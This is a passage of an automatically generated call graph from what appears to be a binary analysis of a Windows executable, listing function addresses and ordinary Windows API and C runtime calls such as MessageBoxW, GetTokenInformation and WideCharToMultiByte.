17445->17446 17475 7ff62c0f26b0 17446->17475 17448 7ff62c0f2cb9 17479 7ff62c104bd8 17448->17479 17451 7ff62c0f26b0 48 API calls 17452 7ff62c0f2d34 FormatMessageW 17451->17452 17454 7ff62c0f2d7f MessageBoxW 17452->17454 17455 7ff62c0f2d6d 17452->17455 17457 7ff62c0fc550 _log10_special 8 API calls 17454->17457 17456 7ff62c0f26b0 48 API calls 17455->17456 17456->17454 17458 7ff62c0f2daf 17457->17458 17458->17147 17460 7ff62c0f9340 GetFinalPathNameByHandleW CloseHandle 17459->17460 17461 7ff62c0f3730 17459->17461 17460->17461 17461->17142 17461->17146 17463 7ff62c0f2834 17462->17463 17464 7ff62c0f26b0 48 API calls 17463->17464 17465 7ff62c0f2887 17464->17465 17466 7ff62c104bd8 48 API calls 17465->17466 17467 7ff62c0f28d0 MessageBoxW 17466->17467 17468 7ff62c0fc550 _log10_special 8 API calls 17467->17468 17469 7ff62c0f2900 17468->17469 17469->17147 17471 7ff62c0f946a WideCharToMultiByte 17470->17471 17474 7ff62c0f9495 17470->17474 17473 7ff62c0f94ab __std_exception_destroy 17471->17473 17471->17474 17472 7ff62c0f94b2 WideCharToMultiByte 17472->17473 17473->17141 17474->17472 17474->17473 17476 7ff62c0f26d5 17475->17476 17477 7ff62c104bd8 48 API calls 17476->17477 17478 7ff62c0f26f8 17477->17478 17478->17448 17480 7ff62c104c32 17479->17480 17481 7ff62c104c57 17480->17481 17483 7ff62c104c93 17480->17483 17482 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17481->17482 17485 7ff62c104c81 17482->17485 17497 7ff62c102f90 17483->17497 17487 7ff62c0fc550 _log10_special 8 API calls 17485->17487 17486 7ff62c104d74 17488 7ff62c10a948 __free_lconv_mon 11 API calls 17486->17488 17489 7ff62c0f2d04 17487->17489 17488->17485 17489->17451 17491 7ff62c104d9a 17491->17486 17493 7ff62c104da4 17491->17493 17492 7ff62c104d49 17494 7ff62c10a948 __free_lconv_mon 11 API calls 17492->17494 17496 7ff62c10a948 __free_lconv_mon 11 API calls 17493->17496 17494->17485 17495 7ff62c104d40 17495->17486 17495->17492 17496->17485 17498 7ff62c102fce 17497->17498 17499 7ff62c102fbe 17497->17499 17500 7ff62c102fd7 17498->17500 17505 7ff62c103005 17498->17505 17503 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17499->17503 17501 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17500->17501 17502 7ff62c102ffd 17501->17502 17502->17486 17502->17491 17502->17492 17502->17495 17503->17502 17505->17499 17505->17502 17508 7ff62c1039a4 17505->17508 17541 7ff62c1033f0 17505->17541 17578 7ff62c102b80 17505->17578 17509 7ff62c103a57 17508->17509 17510 7ff62c1039e6 17508->17510 17513 7ff62c103ab0 17509->17513 17514 7ff62c103a5c 17509->17514 17511 7ff62c103a81 17510->17511 17512 7ff62c1039ec 17510->17512 17601 7ff62c101d54 17511->17601 17515 7ff62c1039f1 17512->17515 17516 7ff62c103a20 17512->17516 17520 7ff62c103ac7 17513->17520 17522 7ff62c103aba 17513->17522 17526 7ff62c103abf 17513->17526 17517 7ff62c103a91 17514->17517 17518 7ff62c103a5e 17514->17518 17515->17520 17523 7ff62c1039f7 17515->17523 17516->17523 17516->17526 17608 7ff62c101944 17517->17608 17521 7ff62c103a00 17518->17521 17530 7ff62c103a6d 17518->17530 17615 7ff62c1046ac 17520->17615 17539 7ff62c103af0 17521->17539 17581 7ff62c104158 17521->17581 17522->17511 17522->17526 17523->17521 17529 7ff62c103a32 17523->17529 17537 7ff62c103a1b 17523->17537 17526->17539 17619 7ff62c102164 17526->17619 17529->17539 17591 7ff62c104494 17529->17591 17530->17511 17531 7ff62c103a72 17530->17531 17531->17539 17597 7ff62c104558 17531->17597 17533 7ff62c0fc550 _log10_special 8 API calls 17534 7ff62c103dea 17533->17534 17534->17505 17537->17539 17540 7ff62c103cdc 17537->17540 17626 7ff62c1047c0 17537->17626 17539->17533 17540->17539 17632 7ff62c10ea08 17540->17632 17542 7ff62c103414 17541->17542 17543 7ff62c1033fe 17541->17543 17544 7ff62c103454 17542->17544 17545 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17542->17545 17543->17544 17546 7ff62c103a57 17543->17546 17547 7ff62c1039e6 17543->17547 17544->17505 17545->17544 17550 7ff62c103ab0 17546->17550 17551 7ff62c103a5c 17546->17551 17548 7ff62c103a81 17547->17548 17549 7ff62c1039ec 17547->17549 17556 7ff62c101d54 38 API calls 17548->17556 17552 7ff62c1039f1 17549->17552 17553 7ff62c103a20 17549->17553 17557 7ff62c103ac7 17550->17557 17559 7ff62c103aba 17550->17559 17563 7ff62c103abf 17550->17563 17554 7ff62c103a91 17551->17554 17555 7ff62c103a5e 17551->17555 17552->17557 17560 7ff62c1039f7 17552->17560 17553->17560 17553->17563 17561 7ff62c101944 38 API calls 17554->17561 17558 7ff62c103a00 17555->17558 17566 7ff62c103a6d 17555->17566 17573 7ff62c103a1b 17556->17573 17564 7ff62c1046ac 45 API calls 17557->17564 17562 7ff62c104158 47 API calls 17558->17562 17576 7ff62c103af0 17558->17576 17559->17548 17559->17563 17560->17558 17567 7ff62c103a32 17560->17567 17560->17573 17561->17573 17562->17573 17565 7ff62c102164 38 API calls 17563->17565 17563->17576 17564->17573 17565->17573 17566->17548 17568 7ff62c103a72 17566->17568 17569 7ff62c104494 46 API calls 17567->17569 17567->17576 17571 7ff62c104558 37 API calls 17568->17571 17568->17576 17569->17573 17570 7ff62c0fc550 _log10_special 8 API calls 17572 7ff62c103dea 17570->17572 17571->17573 17572->17505 17574 7ff62c1047c0 45 API calls 17573->17574 17573->17576 17577 7ff62c103cdc 17573->17577 17574->17577 17575 7ff62c10ea08 46 API calls 17575->17577 17576->17570 17577->17575 17577->17576 17798 7ff62c100fc8 17578->17798 17582 7ff62c10417e 17581->17582 17644 7ff62c100b80 17582->17644 17587 7ff62c1047c0 45 API calls 17590 7ff62c1042c3 17587->17590 17588 7ff62c104351 17588->17537 17588->17588 17589 7ff62c1047c0 45 API calls 17589->17588 17590->17588 17590->17589 17590->17590 17593 7ff62c1044c9 17591->17593 17592 7ff62c10450e 17592->17537 17593->17592 17594 7ff62c1044e7 17593->17594 17595 7ff62c1047c0 45 API calls 17593->17595 17596 7ff62c10ea08 46 API calls 17594->17596 17595->17594 17596->17592 17600 7ff62c104579 17597->17600 17598 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17599 7ff62c1045aa 17598->17599 17599->17537 17600->17598 17600->17599 17602 7ff62c101d87 17601->17602 17603 7ff62c101db6 17602->17603 17605 7ff62c101e73 17602->17605 17607 7ff62c101df3 17603->17607 17771 7ff62c100c28 17603->17771 17606 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17605->17606 17606->17607 17607->17537 17609 7ff62c101977 17608->17609 17610 7ff62c1019a6 17609->17610 17612 7ff62c101a63 17609->17612 17611 7ff62c100c28 12 API calls 17610->17611 17614 7ff62c1019e3 17610->17614 17611->17614 17613 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17612->17613 17613->17614 17614->17537 17616 7ff62c1046ef 17615->17616 17618 7ff62c1046f3 __crtLCMapStringW 17616->17618 17779 7ff62c104748 17616->17779 17618->17537 17620 7ff62c102197 17619->17620 17621 7ff62c1021c6 17620->17621 17623 7ff62c102283 17620->17623 17622 7ff62c100c28 12 API calls 17621->17622 17625 7ff62c102203 17621->17625 17622->17625 17624 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17623->17624 17624->17625 17625->17537 17627 7ff62c1047d7 17626->17627 17783 7ff62c10d9b8 17627->17783 17633 7ff62c10ea39 17632->17633 17639 7ff62c10ea47 17632->17639 17634 7ff62c10ea67 17633->17634 17637 7ff62c1047c0 45 API calls 17633->17637 17633->17639 17635 7ff62c10ea78 17634->17635 17636 7ff62c10ea9f 17634->17636 17791 7ff62c1100a0 17635->17791 17636->17639 17640 7ff62c10eac9 17636->17640 17641 7ff62c10eb2a 17636->17641 17637->17634 17639->17540 17640->17639 17643 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 17640->17643 17642 7ff62c10f8a0 _fread_nolock MultiByteToWideChar 17641->17642 17642->17639 17643->17639 17645 7ff62c100bb7 17644->17645 17651 7ff62c100ba6 17644->17651 17646 7ff62c10d5fc _fread_nolock 12 API calls 17645->17646 17645->17651 17647 7ff62c100be4 17646->17647 17648 7ff62c100bf8 17647->17648 17649 7ff62c10a948 __free_lconv_mon 11 API calls 17647->17649 17650 7ff62c10a948 __free_lconv_mon 11 API calls 17648->17650 17649->17648 17650->17651 17652 7ff62c10e570 17651->17652 17653 7ff62c10e58d 17652->17653 17655 7ff62c10e5c0 17652->17655 17654 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17653->17654 17664 7ff62c1042a1 17654->17664 17655->17653 17656 7ff62c10e5f2 17655->17656 17660 7ff62c10e705 17656->17660 17669 7ff62c10e63a 17656->17669 17657 7ff62c10e7f7 17698 7ff62c10da5c 17657->17698 17658 7ff62c10e7bd 17691 7ff62c10ddf4 17658->17691 17660->17657 17660->17658 17661 7ff62c10e78c 17660->17661 17663 7ff62c10e74f 17660->17663 17666 7ff62c10e745 17660->17666 17684 7ff62c10e0d4 17661->17684 17674 7ff62c10e304 17663->17674 17664->17587 17664->17590 17666->17658 17668 7ff62c10e74a 17666->17668 17668->17661 17668->17663 17669->17664 17670 7ff62c10a4a4 __std_exception_copy 37 API calls 17669->17670 17671 7ff62c10e6f2 17670->17671 17671->17664 17672 7ff62c10a900 _isindst 17 API calls 17671->17672 17673 7ff62c10e854 17672->17673 17707 7ff62c1140ac 17674->17707 17678 7ff62c10e3ac 17679 7ff62c10e401 17678->17679 17681 7ff62c10e3cc 17678->17681 17683 7ff62c10e3b0 17678->17683 17760 7ff62c10def0 17679->17760 17681->17681 17756 7ff62c10e1ac 17681->17756 17683->17664 17685 7ff62c1140ac 38 API calls 17684->17685 17686 7ff62c10e11e 17685->17686 17687 7ff62c113af4 37 API calls 17686->17687 17688 7ff62c10e16e 17687->17688 17689 7ff62c10e172 17688->17689 17690 7ff62c10e1ac 45 API calls 17688->17690 17689->17664 17690->17689 17692 7ff62c1140ac 38 API calls 17691->17692 17693 7ff62c10de3f 17692->17693 17694 7ff62c113af4 37 API calls 17693->17694 17695 7ff62c10de97 17694->17695 17696 7ff62c10de9b 17695->17696 17697 7ff62c10def0 45 API calls 17695->17697 17696->17664 17697->17696 17699 7ff62c10daa1 17698->17699 17700 7ff62c10dad4 17698->17700 17701 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17699->17701 17702 7ff62c10daec 17700->17702 17705 7ff62c10db6d 17700->17705 17704 7ff62c10dacd memcpy_s 17701->17704 17703 7ff62c10ddf4 46 API calls 17702->17703 17703->17704 17704->17664 17705->17704 17706 7ff62c1047c0 45 API calls 17705->17706 17706->17704 17708 7ff62c1140ff fegetenv 17707->17708 17709 7ff62c117e2c 37 API calls 17708->17709 17714 7ff62c114152 17709->17714 17710 7ff62c11417f 17713 7ff62c10a4a4 __std_exception_copy 37 API calls 17710->17713 17711 7ff62c114242 17712 7ff62c117e2c 37 API calls 17711->17712 17715 7ff62c11426c 17712->17715 17716 7ff62c1141fd 17713->17716 17714->17711 17717 7ff62c11416d 17714->17717 17718 7ff62c11421c 17714->17718 17719 7ff62c117e2c 37 API calls 17715->17719 17720 7ff62c115324 17716->17720 17726 7ff62c114205 17716->17726 17717->17710 17717->17711 17721 7ff62c10a4a4 __std_exception_copy 37 API calls 17718->17721 17722 7ff62c11427d 17719->17722 17724 7ff62c10a900 _isindst 17 API calls 17720->17724 17721->17716 17723 7ff62c118020 20 API calls 17722->17723 17730 7ff62c1142e6 memcpy_s 17723->17730 17725 7ff62c115339 17724->17725 17727 7ff62c0fc550 _log10_special 8 API calls 17726->17727 17728 7ff62c10e351 17727->17728 17752 7ff62c113af4 17728->17752 17729 7ff62c11468f memcpy_s 17730->17729 17731 7ff62c114327 memcpy_s 17730->17731 17736 7ff62c104f08 _get_daylight 11 API calls 17730->17736 17747 7ff62c114c6b memcpy_s 17731->17747 17748 7ff62c114783 memcpy_s 17731->17748 17732 7ff62c113c10 37 API calls 17738 7ff62c1150e7 17732->17738 17733 7ff62c1149cf 17733->17732 17734 7ff62c11533c memcpy_s 37 API calls 17734->17733 17735 7ff62c11497b 17735->17733 17735->17734 17737 7ff62c114760 17736->17737 17739 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17737->17739 17740 7ff62c11533c memcpy_s 37 API calls 17738->17740 17750 7ff62c115142 17738->17750 17739->17731 17740->17750 17741 7ff62c1152c8 17743 7ff62c117e2c 37 API calls 17741->17743 17742 7ff62c104f08 11 API calls _get_daylight 17742->17747 17743->17726 17744 7ff62c104f08 11 API calls _get_daylight 17744->17748 17745 7ff62c113c10 37 API calls 17745->17750 17746 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 17746->17748 17747->17733 17747->17735 17747->17742 17751 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 17747->17751 17748->17735 17748->17744 17748->17746 17749 7ff62c11533c memcpy_s 37 API calls 17749->17750 17750->17741 17750->17745 17750->17749 17751->17747 17753 7ff62c113b13 17752->17753 17754 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17753->17754 17755 7ff62c113b3e memcpy_s 17753->17755 17754->17755 17755->17678 17757 7ff62c10e1d8 memcpy_s 17756->17757 17758 7ff62c1047c0 45 API calls 17757->17758 17759 7ff62c10e292 memcpy_s 17757->17759 17758->17759 17759->17683 17761 7ff62c10df2b 17760->17761 17764 7ff62c10df78 memcpy_s 17760->17764 17762 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17761->17762 17763 7ff62c10df57 17762->17763 17763->17683 17765 7ff62c10dfe3 17764->17765 17767 7ff62c1047c0 45 API calls 17764->17767 17766 7ff62c10a4a4 __std_exception_copy 37 API calls 17765->17766 17770 7ff62c10e025 memcpy_s 17766->17770 17767->17765 17768 7ff62c10a900 _isindst 17 API calls 17769 7ff62c10e0d0 17768->17769 17770->17768 17772 7ff62c100c5f 17771->17772 17773 7ff62c100c4e 17771->17773 17772->17773 17774 7ff62c10d5fc _fread_nolock 12 API calls 17772->17774 17773->17607 17775 7ff62c100c90 17774->17775 17776 7ff62c100ca4 17775->17776 17777 7ff62c10a948 __free_lconv_mon 11 API calls 17775->17777 17778 7ff62c10a948 __free_lconv_mon 11 API calls 17776->17778 17777->17776 17778->17773 17780 7ff62c10476e 17779->17780 17781 7ff62c104766 17779->17781 17780->17618 17782 7ff62c1047c0 45 API calls 17781->17782 17782->17780 17784 7ff62c10d9d1 17783->17784 17786 7ff62c1047ff 17783->17786 17785 7ff62c113304 45 API calls 17784->17785 17784->17786 17785->17786 17787 7ff62c10da24 17786->17787 17788 7ff62c10da3d 17787->17788 17790 7ff62c10480f 17787->17790 17789 7ff62c112650 45 API calls 17788->17789 17788->17790 17789->17790 17790->17540 17794 7ff62c116d88 17791->17794 17797 7ff62c116dec 17794->17797 17795 7ff62c0fc550 _log10_special 8 API calls 17796 7ff62c1100bd 17795->17796 17796->17639 17797->17795 17799 7ff62c10100f 17798->17799 17800 7ff62c100ffd 17798->17800 17802 7ff62c10101d 17799->17802 17807 7ff62c101059 17799->17807 17801 7ff62c104f08 _get_daylight 11 API calls 17800->17801 17803 7ff62c101002 17801->17803 17805 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17802->17805 17804 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17803->17804 17814 7ff62c10100d 17804->17814 17805->17814 17806 7ff62c1013d5 17809 7ff62c104f08 _get_daylight 11 API calls 17806->17809 17806->17814 17807->17806 17808 7ff62c104f08 _get_daylight 11 API calls 17807->17808 17810 7ff62c1013ca 17808->17810 17811 7ff62c101669 17809->17811 17813 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17810->17813 17812 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17811->17812 17812->17814 17813->17806 17814->17505 17816 7ff62c100704 17815->17816 17843 7ff62c100464 17816->17843 17818 7ff62c10071d 17818->17158 17855 7ff62c1003bc 17819->17855 17823 7ff62c0fc850 17822->17823 17824 7ff62c0f2930 GetCurrentProcessId 17823->17824 17825 7ff62c0f1c80 49 API calls 17824->17825 17826 7ff62c0f2979 17825->17826 17869 7ff62c104984 17826->17869 17831 7ff62c0f1c80 49 API calls 17832 7ff62c0f29ff 17831->17832 17899 7ff62c0f2620 17832->17899 17835 7ff62c0fc550 _log10_special 8 API calls 17836 7ff62c0f2a31 17835->17836 17836->17197 17838 7ff62c100119 17837->17838 17842 7ff62c0f1b89 17837->17842 17839 7ff62c104f08 _get_daylight 11 API calls 17838->17839 17840 7ff62c10011e 17839->17840 17841 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17840->17841 17841->17842 17842->17196 17842->17197 17844 7ff62c1004ce 17843->17844 17845 7ff62c10048e 17843->17845 17844->17845 17846 7ff62c1004da 17844->17846 17847 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17845->17847 17854 7ff62c10546c EnterCriticalSection 17846->17854 17850 7ff62c1004b5 17847->17850 17850->17818 17856 7ff62c0f1a20 17855->17856 17857 7ff62c1003e6 17855->17857 17856->17165 17856->17166 17857->17856 17858 7ff62c1003f5 memcpy_s 17857->17858 17859 7ff62c100432 17857->17859 17862 7ff62c104f08 _get_daylight 11 API calls 17858->17862 17868 7ff62c10546c EnterCriticalSection 17859->17868 17864 7ff62c10040a 17862->17864 17865 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 17864->17865 17865->17856 17873 7ff62c1049de 17869->17873 17870 7ff62c104a03 17871 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17870->17871 17875 7ff62c104a2d 17871->17875 17872 7ff62c104a3f 17908 7ff62c102c10 17872->17908 17873->17870 17873->17872 17876 7ff62c0fc550 _log10_special 8 API calls 17875->17876 17878 7ff62c0f29c3 17876->17878 17877 7ff62c10a948 __free_lconv_mon 11 API calls 17877->17875 17887 7ff62c105160 17878->17887 17880 7ff62c104b40 17882 7ff62c104b1c 17880->17882 17883 7ff62c104b4a 17880->17883 17881 7ff62c104ae8 17881->17882 17886 7ff62c104af1 17881->17886 17882->17877 17885 7ff62c10a948 __free_lconv_mon 11 API calls 17883->17885 17884 7ff62c10a948 __free_lconv_mon 11 API calls 17884->17875 17885->17875 17886->17884 17888 7ff62c10b2c8 _get_daylight 11 API calls 17887->17888 17889 7ff62c105177 17888->17889 17890 7ff62c0f29e5 17889->17890 17891 7ff62c10eb98 _get_daylight 11 API calls 17889->17891 17894 7ff62c1051b7 17889->17894 17890->17831 17892 7ff62c1051ac 17891->17892 17893 7ff62c10a948 __free_lconv_mon 11 API calls 17892->17893 17893->17894 17894->17890 18043 7ff62c10ec20 17894->18043 17897 7ff62c10a900 _isindst 17 API calls 17898 7ff62c1051fc 17897->17898 17900 7ff62c0f262f 17899->17900 17901 7ff62c0f9390 2 API calls 17900->17901 17902 7ff62c0f2660 17901->17902 17903 7ff62c0f2683 MessageBoxA 17902->17903 17904 7ff62c0f266f MessageBoxW 17902->17904 17905 7ff62c0f2690 17903->17905 17904->17905 17906 7ff62c0fc550 _log10_special 8 API calls 17905->17906 17907 7ff62c0f26a0 17906->17907 17907->17835 17909 7ff62c102c4e 17908->17909 17910 7ff62c102c3e 17908->17910 17911 7ff62c102c57 17909->17911 17916 7ff62c102c85 17909->17916 17912 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17910->17912 17913 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17911->17913 17914 7ff62c102c7d 17912->17914 17913->17914 17914->17880 17914->17881 17914->17882 17914->17886 17915 7ff62c1047c0 45 API calls 17915->17916 17916->17910 17916->17914 17916->17915 17918 7ff62c102f34 17916->17918 17922 7ff62c1035a0 17916->17922 17948 7ff62c103268 17916->17948 17978 7ff62c102af0 17916->17978 17920 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17918->17920 17920->17910 17923 7ff62c103655 17922->17923 17924 7ff62c1035e2 17922->17924 17925 7ff62c1036af 17923->17925 17926 7ff62c10365a 17923->17926 17927 7ff62c10367f 17924->17927 17928 7ff62c1035e8 17924->17928 17925->17927 17930 7ff62c1036be 17925->17930 17946 7ff62c103618 17925->17946 17929 7ff62c10368f 17926->17929 17934 7ff62c10365c 17926->17934 17995 7ff62c101b50 17927->17995 17928->17930 17931 7ff62c1035ed 17928->17931 18002 7ff62c101740 17929->18002 17947 7ff62c1036ed 17930->17947 18009 7ff62c101f60 17930->18009 17936 7ff62c1035fd 17931->17936 17937 7ff62c103630 17931->17937 17931->17946 17934->17936 17938 7ff62c10366b 17934->17938 17936->17947 17981 7ff62c103f04 17936->17981 17937->17947 17991 7ff62c1043c0 17937->17991 17938->17927 17940 7ff62c103670 17938->17940 17943 7ff62c104558 37 API calls 17940->17943 17940->17947 17942 7ff62c0fc550 _log10_special 8 API calls 17944 7ff62c103983 17942->17944 17943->17946 17944->17916 17946->17947 18016 7ff62c10e858 17946->18016 17947->17942 17949 7ff62c103289 17948->17949 17951 7ff62c103273 17948->17951 17950 7ff62c1032c7 17949->17950 17954 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17949->17954 17950->17916 17951->17950 17952 7ff62c103655 17951->17952 17953 7ff62c1035e2 17951->17953 17955 7ff62c1036af 17952->17955 17956 7ff62c10365a 17952->17956 17957 7ff62c10367f 17953->17957 17958 7ff62c1035e8 17953->17958 17954->17950 17955->17957 17968 7ff62c1036be 17955->17968 17976 7ff62c103618 17955->17976 17959 7ff62c10368f 17956->17959 17960 7ff62c10365c 17956->17960 17962 7ff62c101b50 38 API calls 17957->17962 17965 7ff62c1035ed 17958->17965 17958->17968 17963 7ff62c101740 38 API calls 17959->17963 17961 7ff62c1035fd 17960->17961 17966 7ff62c10366b 17960->17966 17964 7ff62c103f04 47 API calls 17961->17964 17977 7ff62c1036ed 17961->17977 17962->17976 17963->17976 17964->17976 17965->17961 17967 7ff62c103630 17965->17967 17965->17976 17966->17957 17970 7ff62c103670 17966->17970 17971 7ff62c1043c0 47 API calls 17967->17971 17967->17977 17969 7ff62c101f60 38 API calls 17968->17969 17968->17977 17969->17976 17973 7ff62c104558 37 API calls 17970->17973 17970->17977 17971->17976 17972 7ff62c0fc550 _log10_special 8 API calls 17974 7ff62c103983 17972->17974 17973->17976 17974->17916 17975 7ff62c10e858 47 API calls 17975->17976 17976->17975 17976->17977 17977->17972 18026 7ff62c100d14 17978->18026 17982 7ff62c103f26 17981->17982 17983 7ff62c100b80 12 API calls 17982->17983 17984 7ff62c103f6e 17983->17984 17985 7ff62c10e570 46 API calls 17984->17985 17986 7ff62c104041 17985->17986 17987 7ff62c104063 17986->17987 17988 7ff62c1047c0 45 API calls 17986->17988 17989 7ff62c1047c0 45 API calls 17987->17989 17990 7ff62c1040ec 17987->17990 17988->17987 17989->17990 17990->17946 17992 7ff62c1043d8 17991->17992 17994 7ff62c104440 17991->17994 17993 7ff62c10e858 47 API calls 17992->17993 17992->17994 17993->17994 17994->17946 17997 7ff62c101b83 17995->17997 17996 7ff62c101bb2 17998 7ff62c100b80 12 API calls 17996->17998 18001 7ff62c101bef 17996->18001 17997->17996 17999 7ff62c101c6f 17997->17999 17998->18001 18000 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17999->18000 18000->18001 18001->17946 18003 7ff62c101773 18002->18003 18004 7ff62c1017a2 18003->18004 18006 7ff62c10185f 18003->18006 18005 7ff62c100b80 12 API calls 18004->18005 18008 7ff62c1017df 18004->18008 18005->18008 18007 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 18006->18007 18007->18008 18008->17946 18010 7ff62c101f93 18009->18010 18011 7ff62c101fc2 18010->18011 18013 7ff62c10207f 18010->18013 18012 7ff62c100b80 12 API calls 18011->18012 18015 7ff62c101fff 18011->18015 18012->18015 18014 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 18013->18014 18014->18015 18015->17946 18017 7ff62c10e880 18016->18017 18018 7ff62c10e8c5 18017->18018 18019 7ff62c1047c0 45 API calls 18017->18019 18021 7ff62c10e8ae memcpy_s 18017->18021 18024 7ff62c10e885 memcpy_s 18017->18024 18018->18021 18022 7ff62c1107e8 WideCharToMultiByte 18018->18022 18018->18024 18019->18018 18020 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 18020->18024 18021->18020 18021->18024 18023 7ff62c10e9a1 18022->18023 18023->18024 18025 7ff62c10e9b6 GetLastError 18023->18025 18024->17946 18025->18021 18025->18024 18027 7ff62c100d53 18026->18027 18028 7ff62c100d41 18026->18028 18031 7ff62c100d60 18027->18031 18034 7ff62c100d9d 18027->18034 18029 7ff62c104f08 _get_daylight 11 API calls 18028->18029 18030 7ff62c100d46 18029->18030 18032 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18030->18032 18033 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 18031->18033 18040 7ff62c100d51 18032->18040 18033->18040 18035 7ff62c100e46 18034->18035 18036 7ff62c104f08 _get_daylight 11 API calls 18034->18036 18037 7ff62c104f08 _get_daylight 11 API calls 18035->18037 18035->18040 18038 7ff62c100e3b 18036->18038 18039 7ff62c100ef0 18037->18039 18041 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18038->18041 18042 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18039->18042 18040->17916 18041->18035 18042->18040 18044 7ff62c10ec3d 18043->18044 18047 7ff62c10ec42 18044->18047 18049 7ff62c1051dd 18044->18049 18050 7ff62c10ec8c 18044->18050 18045 7ff62c104f08 _get_daylight 11 API calls 18046 7ff62c10ec4c 18045->18046 18048 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18046->18048 18047->18045 18047->18049 18048->18049 18049->17890 18049->17897 18050->18049 18051 7ff62c104f08 _get_daylight 11 API calls 18050->18051 18051->18046 18053 7ff62c0f8633 __std_exception_destroy 18052->18053 18054 7ff62c0f85b1 GetTokenInformation 18052->18054 18056 7ff62c0f864c 18053->18056 18057 7ff62c0f8646 CloseHandle 18053->18057 18055 7ff62c0f85d2 GetLastError 18054->18055 18058 7ff62c0f85dd 18054->18058 18055->18053 18055->18058 18056->17215 18057->18056 18058->18053 18059 7ff62c0f85f9 GetTokenInformation 18058->18059 18059->18053 18060 7ff62c0f861c 18059->18060 18060->18053 18061 7ff62c0f8626 ConvertSidToStringSidW 18060->18061 18061->18053 18063 7ff62c0fc850 18062->18063 18064 7ff62c0f2b74 GetCurrentProcessId 18063->18064 18065 7ff62c0f26b0 48 API calls 18064->18065 18066 7ff62c0f2bc7 18065->18066 18067 7ff62c104bd8 48 API calls 18066->18067 18068 7ff62c0f2c10 MessageBoxW 18067->18068 18069 7ff62c0fc550 _log10_special 8 API calls 18068->18069 18070 7ff62c0f2c40 18069->18070 18070->17225 18072 7ff62c0f25e5 18071->18072 18073 7ff62c104bd8 48 API calls 18072->18073 18074 7ff62c0f2604 18073->18074 18074->17240 18120 7ff62c108794 18075->18120 18079 7ff62c0f81dc 18078->18079 18080 7ff62c0f9390 2 API calls 18079->18080 18081 7ff62c0f81fb 18080->18081 18082 7ff62c0f8203 18081->18082 18083 7ff62c0f8216 ExpandEnvironmentStringsW 18081->18083 18085 7ff62c0f2810 49 API calls 18082->18085 18084 7ff62c0f823c __std_exception_destroy 18083->18084 18087 7ff62c0f8253 18084->18087 18088 7ff62c0f8240 18084->18088 18086 7ff62c0f820f __std_exception_destroy 18085->18086 18090 7ff62c0fc550 _log10_special 8 API calls 18086->18090 18092 7ff62c0f82bf 18087->18092 18095 7ff62c0f8261 GetDriveTypeW 18087->18095 18089 7ff62c0f2810 49 API calls 18088->18089 18089->18086 18091 7ff62c0f83af 18090->18091 18091->17239 18110 7ff62c108238 18091->18110 18253 7ff62c107e08 18092->18253 18097 7ff62c0f8295 18095->18097 18098 7ff62c0f82b0 18095->18098 18101 7ff62c0f2810 49 API calls 18097->18101 18246 7ff62c10796c 18098->18246 18101->18086 18111 7ff62c108258 18110->18111 18112 7ff62c108245 18110->18112 18354 7ff62c107ebc 18111->18354 18114 7ff62c104f08 _get_daylight 11 API calls 18112->18114 18116 7ff62c10824a 18114->18116 18118 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 18116->18118 18161 7ff62c111558 18120->18161 18220 7ff62c1112d0 18161->18220 18241 7ff62c1102d8 EnterCriticalSection 18220->18241 18247 7ff62c1079bd 18246->18247 18248 7ff62c10798a 18246->18248 18247->18086 18248->18247 18265 7ff62c110474 18248->18265 18254 7ff62c107e24 18253->18254 18255 7ff62c107e92 18253->18255 18254->18255 18257 7ff62c107e29 18254->18257 18299 7ff62c1107c0 18255->18299 18258 7ff62c107e41 18257->18258 18259 7ff62c107e5e 18257->18259 18274 7ff62c107bd8 GetFullPathNameW 18258->18274 18282 7ff62c107c4c GetFullPathNameW 18259->18282 18266 7ff62c11048b 18265->18266 18267 7ff62c110481 18265->18267 18268 7ff62c104f08 _get_daylight 11 API calls 18266->18268 18267->18266 18272 7ff62c1104a7 18267->18272 18302 7ff62c1105d0 18299->18302 18303 7ff62c1105fb 18302->18303 18304 7ff62c110612 18302->18304 18306 7ff62c110616 18304->18306 18307 7ff62c110637 18304->18307 18361 7ff62c1102d8 EnterCriticalSection 18354->18361 18363 7ff62c0f456a 18362->18363 18364 7ff62c0f9390 2 API calls 18363->18364 18365 7ff62c0f458f 18364->18365 18366 7ff62c0fc550 _log10_special 8 API calls 18365->18366 18367 7ff62c0f45b7 18366->18367 18367->17277 18369 7ff62c0f7e2e 18368->18369 18370 7ff62c0f7f52 18369->18370 18371 7ff62c0f1c80 49 API calls 18369->18371 18372 